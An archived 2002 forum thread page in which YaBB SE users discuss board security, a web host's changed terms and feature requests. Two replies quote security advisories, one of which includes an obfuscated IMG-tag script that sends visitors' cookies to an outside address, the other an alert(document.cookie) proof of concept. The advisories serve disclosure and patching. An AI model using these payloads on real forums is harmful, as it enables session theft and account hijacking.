Welcome, Guest. Please Login or Register.
November 23, 2024, 07:43:57 PM
Home Help Search Log in Register
News: If you are still using YaBB SE, please consider upgrading to SMF as soon as possible.

YaBB SE Community  |  YaBB SE Info  |  News From the YaBB SE Team  |  SE Future... « previous next »
Pages: 1 ... 14 15 [16] 17 18 ... 45 Reply Ignore Print
Author Topic: SE Future...  (Read 700137 times)
phark
Sr. Member
****
Posts: 482


Re:SE Future...
« Reply #225 on: March 26, 2002, 01:46:04 AM »
Reply with quote

This morning, I tested out the latest security vulnerabilities that are effecting vBulletin & Ikonboard (announced last week) on my SE and SP1 installations.

I am pleased to report that both are secure and are not effected by this!! ;D

Now that I shared this good news with you, share some with me... how is that v1.3 coming?   ;)

Logged

I'm not scared of dying, I just don't want to.
Golden Tiger
Jr. Member
**
Posts: 74


Lost all reality...

ICQ - 5689654 WWW
Re:SE Future...
« Reply #226 on: March 26, 2002, 02:10:49 AM »
Reply with quote

Take your time...  I just learned that my too good to be true free webhost drastically changed their TOC... in a way nobody would ever guess... and I am in violation of that TOC... which means no more website or YaBB SE board...

So, once again, no use for YaBB, can't install it anywhere!  :P   So, I guess I'm out of the desprately asking for the release group...

Once all my fancy icons all of a sudden disapear then you know I lost my account.  :P
Logged

Jeff Lewis
Global Moderator
YaBB God
*****
Posts: 10149


I'm a llama!

WWW
Re:SE Future...
« Reply #227 on: March 26, 2002, 02:29:55 AM »
Reply with quote

What are the new vulnerabilities that plague those systems?

Also, your host altered their TOS?  How so?
Logged

Daniel Hofverberg
YaBB God
*****
Posts: 582


WWW
Re:SE Future...
« Reply #228 on: March 26, 2002, 02:35:54 AM »
Reply with quote

Golden Tiger, what web host are you referring to?
Logged
phark
Sr. Member
****
Posts: 482


Re:SE Future...
« Reply #229 on: March 26, 2002, 02:45:47 AM »
Reply with quote

Quote from: Jeff Lewis on March 26, 2002, 02:29:55 AMWhat are the new vulnerabilities that plague those systems?

vBulletin
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
 
Version(s): prior to 2.2.3
 
Description:  A vulnerability was reported in the vBulletin bulletin board software. A remote user can conduct cross-site scripting attacks against other vBulletin users.

It is reported that a remote user can inject scripting code in posts and in private messages within an IMG tag (which is apparently enabled, by default). When the target (victim) user views the message, the code will be executed on the target user's browser. The code will originate from the system running vBulletin and will run in the security context of that system. As a result, the code will be able to access the target user's cookies associated with the vBulletin site.

Some demonstration exploit code is included in the Source Message (below).

QuoteHi

I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in codeTag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags

['img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)['/img]
 

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [iimg] tag,
            as well as requiring it to start with http://".
            Sounds good ;)


 vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still sites using vulnerable versions, so better update!  

 
Impact:  A remote user can cause arbitrary javascript to be executed in a target user's browser. The code will be able to access the target user's cookies associated with the site running the vBulletin software.
 
Solution:  The vendor has reportedly released a fixed version (2.2.4). See the Vendor URL for more information.
« Last Edit: March 26, 2002, 01:29:25 PM by Jeff Lewis » Logged

I'm not scared of dying, I just don't want to.
phark
Sr. Member
****
Posts: 482


Re:SE Future...
« Reply #230 on: March 26, 2002, 02:50:13 AM »
Reply with quote

Quote from: Jeff Lewis on March 26, 2002, 02:29:55 AMWhat are the new vulnerabilities that plague those systems?

Ikonboard
Version(s): 3.0.1, 3.0.2, 3.0.3
 
Description:  A vulnerability was reported in Ikonboard. A remote user can conduct cross-site scripting attacks against other Ikonboard users.

It is reported that Ikonboard filters IMG tags to make sure that they begin with the string 'http://'. However, the filtering reportedly only occurs when posting a new topic and not when editing an existing topic. This allows a remote user with valid access to the bulletin board to inject malicious code that will be executed when another Ikonboard user views the affected message.

The following demonstration exploit transcript is provided:

Make a new post, then "EDIT" the post and in the body of the post insert this code

['IMG]javascript:alert(document.cook ie)[/IMG'] (" ' " inserted by me)

an alert box should pop up displaying your cookies!

The vendor has reportedly been notified. exploittranscript:Make a new post, then "EDIT" the post and in the body of the post insert this code

['IMG]javascript:alert(document.cookie)[/IMG'] (" ' " inserted by me)

an alert box should pop up displaying your cookies!
 
Impact:  A remote user can inject malicious javascript into a message such that when another Ikonboard user views the message, the javascript will be executed. This code will originate from the host running Ikonboard and will run in the security context of that host. As a result, the code will be able to access the target (victim) Ikonboard user's cookies associated with that site. With access to the cookies, the remote user can then gain access to the target user's Ikonboard account.
 
Solution:  No solution was available at the time of this entry.
Logged

I'm not scared of dying, I just don't want to.
Golden Tiger
Jr. Member
**
Posts: 74


Lost all reality...

ICQ - 5689654 WWW
Re:SE Future...
« Reply #231 on: March 26, 2002, 03:11:25 AM »
Reply with quote

Ok, I was on zeroth.net.  They did message board hosting (think clear back.. to the beginning of the year).  They went down, lost their server... actually, they came back in February, and I noticed that, so I asked about the boards and such that they used to host.  They said that they were going to change a few things, mainly get rid of the forum hosting and go to full website hosting.  They wanted to test out a few things, so they said I could transfer my websites over there and give their servers a small testing.  One my accounts were up, I would be able to keep them.  That was February 20th or so...  Zeroth would look over any website you wanted to place on their servers to make sure they had some promise before you could transfer over there.  Seems like a good plan for a free host, in order not to be killed by 100000000 websites being created
They switiched their URL's over to www.zeroth.cc, and my websites switched respectively.  The www.zeroth.net was going to point over to www.zeroth.cc sooner or later, when their website was created (they were going to recreate it to make it look a bit better).

Now, I was informed that their website was up and that they are going "live" now.  Checked out the website, read the text on the front page...
Well, that means I'm out of a web host all of a sudden.  So much for that idea.  If you are all that curious, check out the front page.

I e-mailed the host of the server, told him of the news, I should get a few weeks to transfer to another server... if I can find one...

Sidenote: Google has a cached version of the now defunct plan to add websites at Zeroth.
<< Click here to see >>
(note: my account had some leeway, being the first...  I didn't need a domain, I could have sitename.zeroth.cc just fine)

Sidenote II (because I always add more than 2 cents):  I didn't think the forums was updated yet (for member support back when zeroth hosted forums).  I am right, the profile of the admin still shows zeroth as a forum hosting place!  
<< That is here >>
« Last Edit: March 26, 2002, 03:23:10 AM by Golden Tiger » Logged

Daniel Hofverberg
YaBB God
*****
Posts: 582


WWW
Re:SE Future...
« Reply #232 on: March 26, 2002, 03:23:32 AM »
Reply with quote

I agree - That was certainly a very drastic change of their TOS...
Logged
Golden Tiger
Jr. Member
**
Posts: 74


Lost all reality...

ICQ - 5689654 WWW
Re:SE Future...
« Reply #233 on: March 26, 2002, 03:29:50 AM »
Reply with quote

Both sites had a URL cloak on them... don't think there will be much negative effect other than the lost server...

One was my personal site (which wasn't done much and which had Distortion Forums)

The other was a website for my High School marching band, and since I am a senior I will soon have no control of that...

Certainly not good publicity for either of them, hopefully the URL cloak helped...
Logged

powergen
Full Member
***
Posts: 131


I'm NOT a llama!

ICQ - 133158581 WWW
Re:SE Future...
« Reply #234 on: March 26, 2002, 10:08:47 AM »
Reply with quote

Good to hear SE is SOOO STRONG not to be violated from those vulnerabilities !!

:)


Logged
Golden Tiger
Jr. Member
**
Posts: 74


Lost all reality...

ICQ - 5689654 WWW
Re:SE Future...
« Reply #235 on: March 26, 2002, 12:47:36 PM »
Reply with quote

Interesting...

Got an e-mail from Zeroth, said they wouldn't cancel my accounts for any reason, mainly because I was there so long (as well as the fact that they want to keep the sites they have been hosting so long).  They updated their mainpage to show this...

Well, seems like I still have a host...  better keep URL cloaking on...
Logged

powergen
Full Member
***
Posts: 131


I'm NOT a llama!

ICQ - 133158581 WWW
Re:SE Future...
« Reply #236 on: March 26, 2002, 09:30:27 PM »
Reply with quote

Please !!!!! For this weekend guys !!

Let us spend it on a brand new bulletin board !!!

 ;D



Logged
bigfoot
Noobie
*
Posts: 13


Re:SE Future...
« Reply #237 on: March 26, 2002, 10:11:55 PM »
Reply with quote

how about a way to view it in thread mode

message1
  >reply to message1

message2
  >reply1 to message2
     >reply to reply1 to message2
Logged

[shadow=red,left,300]Chaos Reigns Within.[/shadow]
[shadow=blue,left,300]Reflect, Repent, and Reboot.[/shadow]
[shadow=green,left,300]Order Shall Return.[/shadow][/size]
 [/glow]
bigfoot
Noobie
*
Posts: 13


Re:SE Future...
« Reply #238 on: March 26, 2002, 10:40:47 PM »
Reply with quote

how about being able to remove old messages from certian groups example
group 1 remove after 30 days
group 2 remove after 15 days

and so on..
Logged

[shadow=red,left,300]Chaos Reigns Within.[/shadow]
[shadow=blue,left,300]Reflect, Repent, and Reboot.[/shadow]
[shadow=green,left,300]Order Shall Return.[/shadow][/size]
 [/glow]
phark
Sr. Member
****
Posts: 482


Re:SE Future...
« Reply #239 on: March 26, 2002, 10:45:42 PM »
Reply with quote

Quote from: bigfoot on March 26, 2002, 10:40:47 PMhow about being able to remove old messages from certian groups example
group 1 remove after 30 days
group 2 remove after 15 days

and so on..

Why would you put a link to a picture in your profile that requires a password?   ::)
Logged

I'm not scared of dying, I just don't want to.
Pages: 1 ... 14 15 [16] 17 18 ... 45 Reply Ignore Print 
YaBB SE Community  |  YaBB SE Info  |  News From the YaBB SE Team  |  SE Future... « previous - next »
 


Powered by MySQL Powered by PHP YaBB SE Community | Powered by YaBB SE
© 2001-2003, YaBB SE Dev Team. All Rights Reserved.
SMF 2.1.4 © 2023, Simple Machines
Valid XHTML 1.0! Valid CSS

Page created in 0.018 seconds with 20 queries.